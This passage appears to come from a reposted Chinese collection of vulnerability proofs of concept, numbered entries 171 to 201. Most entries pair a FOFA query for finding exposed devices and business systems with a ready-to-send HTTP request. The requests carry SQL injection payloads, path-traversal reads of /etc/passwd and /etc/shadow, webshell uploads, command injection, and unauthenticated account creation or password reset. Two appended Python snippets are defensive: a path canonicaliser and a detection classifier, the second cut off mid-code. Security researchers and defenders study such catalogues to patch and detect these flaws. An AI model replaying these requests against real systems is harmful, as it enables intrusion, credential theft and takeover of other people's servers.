GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

Time-based blind injection (MySQL SLEEP): a vulnerable host answers about 5 seconds late. Note the ;downloadLogger.action path parameter appended to delete.do.

172. DT HD license-plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"

GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The raw ../ path has to reach the device unchanged; browsers and most HTTP libraries normalise it away before sending (curl needs --path-as-is).

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"

POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

Affects gateways with Remote Access VPN or Mobile Access enabled; Check Point published a hotfix. Because the bug reads /etc/shadow and other local files, rotate credentials stored on any exposed gateway after patching.

174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"

GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinher (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"

GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Time-based blind injection (MSSQL WAITFOR DELAY): a vulnerable host answers about 5 seconds late.

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"

POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
The device configuration file can be fetched through the following paths (one per model):

/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

Send the ../ segments unnormalised (curl --path-as-is).

178. H3C campus network self-service system (iMC) flexFileUpload arbitrary file upload
FOFA: header="/selfservice"

POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Verify: GET /imc/primepush/%2e%2e/flex/12234.txt

The %2e%2e segment is a percent-encoded ../ that steps out of /imc/primepush/ to reach the upload endpoint, and the stored name comes from the form-data name attribute, not from filename.

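Added example, not from the original write-up or from any of the vendors above: a path canonicalisation check of the kind a reverse proxy, WAF rule or log reviewer needs before comparing a request path against an allowed root. It handles the encoded forms that recur in entries 160, 171, 172 and 178 (percent-encoded and double-encoded slashes and dots, servlet-style ";param" path segments, raw ../), so each collapses to its real target. Function names and the allowed root are the example's own.

```python
"""Canonicalise a request target before any traversal check.

Decoding must happen before matching: "%2F..%2F", "%2e%2e" and "%252e" all
look harmless as bytes and only become "../" once decoded."""
import posixpath
from urllib.parse import unquote


def fully_decode(text: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so that
    double-encoded forms such as %252e%252e are resolved as well."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def strip_path_params(path: str) -> str:
    """Drop ';param' suffixes from every segment, as servlet containers do
    before mapping, so 'delete.do;downloadLogger.action' maps as 'delete.do'."""
    return "/".join(segment.split(";", 1)[0] for segment in path.split("/"))


def canonical_path(raw_target: str) -> str:
    """Query string removed, percent-decoded, ';' parameters stripped, duplicate
    slashes collapsed and '.'/'..' resolved. '..' above the root clamps at '/'."""
    path = raw_target.split("?", 1)[0]
    path = strip_path_params(fully_decode(path))
    return posixpath.normpath("/" + path.lstrip("/"))


def escapes_root(raw_target: str, allowed_root: str) -> bool:
    """True when the canonical path lies outside allowed_root."""
    root = posixpath.normpath("/" + allowed_root.strip("/")).rstrip("/") + "/"
    return not (canonical_path(raw_target) + "/").startswith(root)


if __name__ == "__main__":
    # The four request paths quoted in entries 160, 178, 171 and 172.
    for target in (
        "/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
        "/imc/primepush/%2e%2e/flexFileUpload",
        "/run_stop/delete.do;downloadLogger.action?ids=1",
        "/../../../../etc/passwd",
    ):
        print(f"{target!r:80} -> {canonical_path(target)}")
```

Compare the canonical form, never the raw bytes: the Nexus payload in entry 160 becomes /etc/passwd, the iMC path in entry 178 becomes /imc/flexFileUpload, and the CMSV6 path in entry 171 becomes /run_stop/delete.do, which is the name an access-control rule keyed on the literal URL would not see.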
179. Jianwen (建文) engineering management system arbitrary file read

POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"

GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Error-based injection (MySQL updatexml): a vulnerable host returns the database user inside the XPath error message.

181. Runshen (润申) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"

POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

Time-based blind injection (MSSQL WAITFOR DELAY) in the start parameter.

182. Runshen (润申) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"

POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

Creates the account without authentication; check the user table for unexpected accounts when reviewing an exposed instance.

183. Guangzhou Tuchuang (图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"

GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Error-based injection (Oracle ctxsys.drithsx.sn) in the token parameter; a vulnerable host returns 12345654321 (111111*111111) inside the Oracle error.

184. Xunrao (迅饶) X2Modbus gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"

POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The request body is a raw SQL INSERT that the endpoint executes, creating the account root/123456 with PURVIEW 4.

185. Realor (瑞友) Tianyi application virtualization system SQL injection
Affected: version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"

GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

Stacked query (MySQL): the hex string decodes to <?php echo md5("1"); $file = __FILE__; unlink($file); and INTO OUTFILE writes it to .\\..\\..\\WebRoot\\plom.xgi. INTO OUTFILE needs the FILE privilege and a secure_file_priv setting that allows the target directory, so the write can fail on a hardened database even when the injection itself works.

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA: title=="DataCube3"

POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

Time-based blind injection for SQLite, which has no sleep function: the RANDOMBLOB/HEX expression is a heavy query that delays the response on a vulnerable host.

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640 (same CVE as entry 158)
FOFA: "Mura CMS"

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

Time-based blind injection (MySQL SLEEP) in the contenthistid parameter; a vulnerable host answers about 5 seconds late.

188. Santi (叁体) Jiahui video conferencing attachment arbitrary file read
Affected: version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"

GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewer system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
The poi value is fetched server-side as a URL, so a file:// scheme reads local files.
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 (ESAFENET) electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
The /js/../ prefix reaches the servlet through a path that the login filter does not match; the id parameter is concatenated into an MSSQL query.
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
The name query parameter sets the stored extension and the request body is written as the file content, so the handler source below is deployed as an .ashx.
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Step 1: fetch a CSRF token; its value replaces {{token}} in the next request.
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: param is evaluated as Python on the server (hence os.system); this POC writes a marker into a directory that is served as /master/img/.
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: read the marker back.
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet gets a response, the vulnerability is present. The filename field is not sanitised, so the traversal below writes hello.jsp into the deployed fe.war.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behaviour management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
The name field is spliced into a shell command; the POC chains uname -a after a semicolon.
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
The request sets the password of the account named in xgh (here test) to newPass; no session cookie or token accompanies it.
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
The ;.js path parameter makes the request look like a static resource to the authentication filter while the servlet still handles it; goonumStr is injected with a UNION probe.
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
The sid parameter percent-decodes to a backtick command substitution, `ls />/www/aaa.txt`, which lists / into a file under the web root. The request carries a LuCI sysauth cookie, so an authenticated session is used.
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit CMS assetsmanager/upload file upload
FOFA:title="Authenticate Please!"

Step 1: request the login page to obtain the csfr token (the misspelling is Cockpit's own field name):
GET /auth/login?to=/ HTTP/1.1

Response: 200, body contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

Step 2: log in with that token to obtain a session cookie (the POC uses admin/admin):
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Step 3: upload a PHP file through the assets manager with that session, then request it:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) all-media news editing system binary.do SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
TableName is concatenated into the query. Decoded, the value reads DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH, i.e. stacked MSSQL statements with a time delay.
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

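Added example, not part of the reposted article and not code from any of the listed products: a Python triage routine that parses a raw HTTP request and tags it by the payload classes used in entries 186 to 201 above: time-based blind SQL injection in MySQL (SLEEP), MSSQL (WAITFOR DELAY) and SQLite (RANDOMBLOB heavy query), UNION-based injection, local file reads (/etc/passwd, file://) and shell command injection (backtick substitution, chained commands, os.system). Matching runs on the percent-decoded request target and body, decoded twice so double-encoded variants are caught. The rule set, the tag names and the sample requests (rebuilt from the POCs above with a redacted Host, plus one benign control) are my own constructions. Note that the body-carried payloads (186, 187, 190, 191, 193, 195, 201) never reach a standard access log, which records only the request line; to apply these rules you need a reverse proxy or WAF that logs bodies, or a packet capture.

```python
"""Tag raw HTTP requests by the payload classes used in entries 186 to 201
above. Added example, not code from the reposted article or from any of the
listed products. The rule set, tag names and the sample requests (rebuilt
from the POCs above with a redacted Host) are my own constructions."""
import re
from urllib.parse import unquote_plus

# (tag, pattern) applied to the percent-decoded request target and body.
RULES = [
    ("sqli-time-mysql", re.compile(r"\bsleep\s*\(", re.I)),                # 187, 200
    ("sqli-time-mssql", re.compile(r"\bwaitfor\s+delay\b", re.I)),         # 189, 191, 201
    ("sqli-time-sqlite", re.compile(r"\brandomblob\s*\(", re.I)),          # 186 (heavy query)
    ("sqli-union", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),    # 197, 201
    ("file-read", re.compile(r"/etc/passwd|file://", re.I)),               # 188, 190
    ("cmd-injection", re.compile(                                          # 193, 195, 198
        r"`[^`]+`"                                             # backtick substitution
        r"|;\s*(?:uname|id|ls|cat|echo|wget|curl|sh|bash)\b"   # chained shell command
        r"|\bos\.system\s*\(")),                               # Python eval sink
]


def parse_raw_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _sep, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip("\n").split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _sep, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def decode(text):
    """Percent-decode twice so double-encoded payloads are matched as well."""
    return unquote_plus(unquote_plus(text))


def classify(raw):
    """Return the sorted tags whose pattern matches the decoded target or body."""
    _method, target, _headers, body = parse_raw_request(raw)
    haystack = decode(target) + "\n" + decode(body)
    return sorted(tag for tag, rx in RULES if rx.search(haystack))


def _req(method, target, body=""):
    """Minimal raw request; Host is redacted as in the post (constructed)."""
    return f"{method} {target} HTTP/1.1\nHost: your-ip\n\n{body}"


# Sample requests rebuilt from the POCs above; "benign" is a constructed control.
SAMPLES = {
    "186 DataCube3": _req("POST", "/admin/pr_monitor/getting_index_data.php",
        "req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450"),
    "187 Mura CMS": _req("POST", "/index.cfm/_api/json/v1/default/?method=processAsyncObject",
        "object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1"),
    "188 attachment": _req("GET", "/attachment?file=/etc/passwd"),
    "189 deleteStudy": _req("GET", "/xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27--"),
    "190 poihuoqu": _req("POST", "/index.php/admin/Userinfo/poihuoqu", "poi=file:///etc/passwd"),
    "191 NavigationAjax": _req("POST", "/CDGServer3/js/../NavigationAjax",
        "command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId="),
    "193 setSystemTimeAction": _req("POST", "/master/ajaxActions/setSystemTimeAction.php?token_csrf=TOKEN",
        "param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')"),
    "195 send_order": _req("POST", "/send_order.cgi?parameter=operation",
        '{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}'),
    "197 Quotegask_editAction": _req("GET",
        "/entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist"),
    "198 aliyundrive-webdav": _req("GET",
        "/cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20"),
    "200 dmku": _req("GET", "/js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list"),
    "201 binary.do": _req("POST", "/newsedit/newsplan/task/binary.do",
        "TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1"),
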